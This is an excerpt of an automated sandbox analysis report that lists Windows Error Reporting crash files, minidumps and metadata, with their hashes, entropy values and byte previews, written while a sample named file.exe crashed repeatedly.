C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_1209c12b\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8649227754744622
Encrypted:	false
SSDEEP:	192:La1VfavajH56rL03jDm/u7spS274It1hBx:Y2o56rgjC/u7spX4ItN
MD5:	F4775207330948AFDAA9160AD9EEDBD4
SHA1:	83E7F6C06030221B1CE48A4717EA0B30096A39A0
SHA-256:	EF8345D6601548A4BFE6B60B4F25FB1AD88D90AD6A8B99EEA68C539D3E1FD6CA
SHA-512:	59CB71B5C2A4C308D688FED678BFAF3FC46E1A914E97C290E3C874CAD090991BB3A67CBF6AA77CEE1459CDA415706384F322212F1ED8BBC89AD4866D8A4A0863
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.2.8.3.3.0.5.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.1.a.a.a.9.8.-.4.4.0.e.-.4.b.d.a.-.a.a.3.8.-.b.b.4.1.8.3.2.e.d.b.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.a.f.4.3.6.c.-.2.5.5.8.-.4.1.2.f.-.a.9.b.c.-.6.c.0.2.5.2.3.5.c.f.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_121597e8\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8419855119820575
Encrypted:	false
SSDEEP:	192:la1VfavNjH56rL03jDB/u7spS274It1hBx:C2x56rgjl/u7spX4ItN
MD5:	7AF3F4160BC3546410E7DC180A7ECF06
SHA1:	A8E1021D9671D1F5659B12B3070C2B9F4B5EDD21
SHA-256:	8E3D5679AE0FF52EAEBF5503EFAB5D908540ECB1F0B85B442627F4BD58F2CE30
SHA-512:	1473363C59EC492E38F62DF1D98D5D56C3F0FC5447E0BF840BD2360B98BFF3C995AB540F68C180E1F2C5A3B67E3F8A98093809762B2D59439D5B8064DB338BAA
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.1.9.6.6.0.7.9.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.c.5.4.4.c.a.-.8.6.5.5.-.4.6.7.7.-.8.d.f.4.-.4.5.e.7.6.b.4.a.d.e.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.4.e.0.4.2.4.-.4.d.1.c.-.4.f.a.9.-.a.7.1.1.-.0.3.8.a.d.4.d.a.5.5.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_1745ca23\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.865131622299613
Encrypted:	false
SSDEEP:	192:J2Ua1Vfav5jH56rL03jDm/u7spS274It1hBx:J2H2956rgjC/u7spX4ItN
MD5:	AA18E6B88F975382D4C2861CC5E75DC4
SHA1:	DABD45C838268B1602C22056BAB93703F0DB8C62
SHA-256:	BC747973575F366D8EF8E4D50B3DE344898C495042633621EB3002BC79F10A55
SHA-512:	273E6418F99AB09E6EF9060A8489DA66A399C88987F16086A570C17E43313B04BF0D05449D5F23A2F88CB096FB1465A57C8F5F469978B66F2B4CE35A4B5541E2
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.3.2.1.6.8.3.5.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.a.6.b.5.7.2.-.e.d.9.c.-.4.d.3.5.-.9.6.4.6.-.3.0.c.2.9.d.e.c.e.4.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.6.1.6.b.d.7.-.8.1.6.1.-.4.1.1.d.-.b.b.8.a.-.4.2.9.d.3.5.6.a.2.1.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c53b2fc9a1ffa4aae2b84b74286e467c848ba0_440dec59_17858673\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8285394352078531
Encrypted:	false
SSDEEP:	192:ya1VfavZjH56rL03jDk/u7spS274It1hBx:12d56rgjg/u7spX4ItN
MD5:	2A81DD4A38A9BDCD1200AF8DEA157BD4
SHA1:	3F01398449B2CDAE288AD4AEF8505510F1A83139
SHA-256:	6734F0FBA66160E412948559AA719791BE95445EBD931321509C4384F826C7EF
SHA-512:	50A0A10FA442742D4C55FF120C646BC7210105CEA58C3637BC51A775BF31E71E2176C6151EF296A34A330B8772A5940F14C0ABCF21A4A257ED31DD6C1EBB58FA
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.1.5.1.9.7.8.2.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.3.3.c.b.7.f.-.a.b.6.d.-.4.9.d.7.-.b.4.8.c.-.6.e.a.6.9.d.d.1.d.0.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.3.6.7.e.8.4.-.0.1.6.f.-.4.b.e.9.-.a.9.7.0.-.7.1.9.8.0.9.6.2.3.f.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_e5c8e0fd69b3d1364c1ea6934df3966ffe947bd_440dec59_140eaddc\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9678260315854657
Encrypted:	false
SSDEEP:	192:Xa1Vfav7KHox3uC03jDyrD/u7sOS274It1hBx:k2mox3uVjg/u7sOX4ItN
MD5:	68AF24C5DEAF1453F7D607BB4DD0279E
SHA1:	AB8B5EA018F441C6C3D62C08D8C0240F7EAF00BE
SHA-256:	5AE13107077086F735700BB6498A578CDA9BC7CC1A9B47E6B34FADF36A3DC5B7
SHA-512:	721F0658EA885A800E911DCD6D16E113690460FB8278065E5F249B31B15A0F897E3D63CAF84D17989FB02B3C68B56EDA2B10ED000E3906C5B82C5E94FE7DCD24
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.7.9.0.3.9.0.9.7.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.4.4.8.e.9.7.-.0.c.a.2.-.4.7.d.b.-.9.a.b.9.-.9.a.2.9.3.8.0.6.8.d.4.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.e.e.e.b.e.4.-.f.7.0.8.-.4.b.0.5.-.8.1.f.0.-.9.6.f.f.3.f.9.0.5.c.d.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.a.-.4.1.4.8.-.d.c.1.7.8.a.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CC5.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:42:39 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	117220
Entropy (8bit):	2.171685774044434
Encrypted:	false
SSDEEP:	768:FI/PBkhVEYvm8d3wO/3CZAwIeHO9/gAPTrRAldt8TUqN4gbgD:2Yvtd3L/3CZAwI8iPTlAbt8TUqegU
MD5:	53D096E53810CDC2FD82D8C2FC4EB6F4
SHA1:	F1664160856545D236482A046293E9009BDEA1D4
SHA-256:	25402E81B2D4CCF591836D6D8A427B87DDEC1B5798A64B1925397676B8EB14D9
SHA-512:	8C962FF68E2289E2A1550DA8D1BC244695F8862AFE9AC8A639BC2F2CDCE2FAF80271A73FE3C1D815DB2AAE42D61B552D5743BB3AC368F888370F45D1A4F0C20A
Malicious:	false
Preview:	MDMP....... .........;c............D...............L...........rI..........T.......8...........T............2..............$................................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FB4.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.6967902447323535
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCS6g4HL6YqCSU8qagmf6VSjCpBp89bnRFtsfNiFBm:RrlsNiw6z6YfSU8qagmfkSPnRFmfN28
MD5:	6F70E68FE71386EF665B24AC6826A60D
SHA1:	0C9DA63AED4CD90E2DE6548B1303480C7F2B258C
SHA-256:	204BB6E0515B58E2D2BEDEB3AA628F46748FB7259235E6EA45E7A601DBA9D8DF
SHA-512:	1512DCD3FEAE520FBB090939B40B93F63B38F93C7827200D5D19101958E3A914F7FF9E950561B087FA89BEF558DA429FB179FC37D345F541C3C49B3165BD63C0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3052.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.457591358157864
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTJgtWI98aWgc8sqYjo2s8fm8M4JbHvMFZI+q8vcHvqr8MjT9d:uITft/bgrsqYVRJrOIKqqr8MX9d
MD5:	7FD8A5572F7BE2B113D6061A48014B83
SHA1:	3DD34EED3BD9E30B684132FD1819381E53342F76
SHA-256:	BDCB808BE78464FFBE363AD9145B87C3335188F53031F61559201B6256002A66
SHA-512:	2FA690CAF4D86DA005504D4EA3C1A956922E9EF40CF63D72ADFC6FF8448AF17DC848EEA30804DE04FF789BF2212B8A098822F93621B7C2F89DEE3A601AD68C79
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8385.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:41:55 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	50922
Entropy (8bit):	2.273447027047403
Encrypted:	false
SSDEEP:	192:XCINfMGumY1tOPorG9lWpywU+TDN4cAF9ZBGrucwUklXxF2YZwGaZnLKMob6/T:BYePAdywU+Tp4LFirwUmB88wGPK
MD5:	324EEFE49E9D0DEFBD43AEE521306046
SHA1:	374848DE4828FA488E4390BF71237DDA06752171
SHA-256:	445D650A8448E51F28BF71126ABD05AB9CE2E83681D8F185CD7EBE8235FF22CB
SHA-512:	D7A9E62185ADC7BAE4CD76B5531C68111E0B8B89BF2C277BB9176AF2ABD201D8667ED15E69C21D5B613E8A42BF9D68E6F59B3643025F69A96A89EA18802C0791
Malicious:	false
Preview:	MDMP....... .......S.;c........................\................*..........T.......8...........T...........(..............(................................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER857A.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8370
Entropy (8bit):	3.6937019660029318
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCb6X6YqrSUZPBgmf6VSjCpBw89b4Ftsf6Im:RrlsNip6X6YWSUZPBgmfkSc4FmfU
MD5:	6C8688EBB7010CFD7C688D3C37E7FCFB
SHA1:	A4917D1D3FD8AC23FADF4BAA75B17340989D3735
SHA-256:	012CE7701033C5376F535AA945C2747E9B84C521C18805A4D88D2CE08812AA7B
SHA-512:	361AB34A7C9488610252967FBFD0E6E7221B27AF4BCAE03FD99D317AD85F559E18DA731982C1E605B7319E1833141AF6F964B12E6570C662B7D15A6B312E0CFA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.3.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8618.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4674
Entropy (8bit):	4.455859214836681
Encrypted:	false
SSDEEP:	48:cvIwSD8zssJgtWI98aWgc8sqYjoh8fm8M4JbHvMFs2LS+q8vcHvqr8MjT9d:uITfq/bgrsqYLJr1Kqqr8MX9d
MD5:	E65AEFCE2C6107E0DA77FA8BE3AF7183
SHA1:	3BEFC6C15F2637E1B509462A38CEF8B5CF5EC7AE
SHA-256:	0DD8637F0DA6959D903215ECE9C21598FAB11544ECB5F28D72C4C35ABCBF75A8
SHA-512:	0646C7A0768AC5672FF073CB466115C3601AA8533A64C1463BEC3B90E5A28EBEE5F65601D910C60D351337D83C4D8B916E1C35C77143A5FB78A6A34B1406FF45
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D78.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 4 00:41:58 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	64038
Entropy (8bit):	2.3403867555897593
Encrypted:	false
SSDEEP:	384:PFryPYE0bAAJT0w//lcs11ULFAlwUmr88tXJS7c6RC:gPY5bAAJ4m/us1yRAlIr88tORC
MD5:	70A6A5DE9FED643A38A2B4D83103F43F
SHA1:	127342FFBEAAE048CAC24399ACB45488AF2D51E9
SHA-256:	93797F24E952DDA4AB9E91A3A95F139F9A23CFA4D7141D81B034B3E74E8547C4
SHA-512:	A27B6A7033D9310952B30214AF4A4211C748DA2C8182CAF19FA147129593235ED03627CED493C45C2EFAA948C6790229AB1434461803EB989184DFBF244D7002
Malicious:	false
Preview:	MDMP....... .......V.;c........................4...........T...............T.......8...........T...............F...........0................................................................................U...........B..............GenuineIntelW...........T...........O.;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F6D.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.6970745210949656
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWCZ6Lkh6YqmSUmpGgmf6VSjCpBux89btFtsfwvm:RrlsNir6O6Y7SUmpGgmfkSYtFmfV
MD5:	7759F1A2DF462F27DF8EA98CB6EF34A1
SHA1:	4F59EF97BC312D9538B1C2050FA8848BA45B2997
SHA-256:	3A67760801F5C8F00C4DE9584B71644DF2BDFE52B3A2B5BFD3EA4A2302780D74
SHA-512:	A227DD51D3D049972962193A569895AAAD51064C524B776257A5A949EC101338BBD8560E9DFFCF3224C25D09468BDFBF0FC13F5454F8486652AC0940CBF31B3D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 